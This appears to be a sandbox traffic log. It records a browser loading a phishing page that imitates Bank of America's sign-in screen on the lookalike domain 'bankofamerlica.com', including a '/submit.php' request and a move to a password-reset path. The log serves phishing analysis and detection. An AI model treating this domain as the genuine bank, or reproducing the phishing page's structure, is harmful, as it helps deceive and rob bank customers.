Source: global traffic	HTTP traffic detected: GET /assets/pill.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/BOA.PNG HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/powered_by_logo.svg HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/pill.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/BOA.PNG HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/gfootb-static-sprite.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/vipaa-v4-jawr.js HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/special/js/main.js HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/BofA_rgb.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/fsd-secure-esp-sprite.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/help-qm-fsd.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/powered_by_logo.svg HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/vipaa-v4-jawr-print.css HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/gfootb-static-sprite.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/special/js/main.js HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/sign-in-sprite.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/help-qm-fsd.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/fsd-secure-esp-sprite.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/BofA_rgb.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/gfoot-home-icon.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/cnx-regular.woff HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://online.access.secure.bankofamerlica.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/sign-in-sprite.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/gfoot-home-icon.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/favicon.ico HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCOvUygEI/IPLAQiVocsBCIWgzQEI3L3NAQjpxc0BCJLKzQEIucrNAQis0c0BCInTzQEI29PNAQj2080BCNLWzQEIp9jNAQjp2M0BCPnA1BUYwcvMARi50s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/favicon.ico HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/help-qm-fsd-hover.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/help-qm-fsd-hover.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /submit.php HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/error-large.gif HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/error-large.gif HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=1; ppath=auth/reset/reset-entry/
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCOvUygEI/IPLAQiVocsBCIWgzQEI3L3NAQjpxc0BCJLKzQEIucrNAQis0c0BCInTzQEI29PNAQj2080BCNLWzQEIp9jNAQjp2M0BCPnA1BUYwcvMARi50s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCOvUygEI/IPLAQiVocsBCIWgzQEI3L3NAQjpxc0BCJLKzQEIucrNAQis0c0BCInTzQEI29PNAQj2080BCNLWzQEIp9jNAQjp2M0BCPnA1BUYwcvMARi50s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
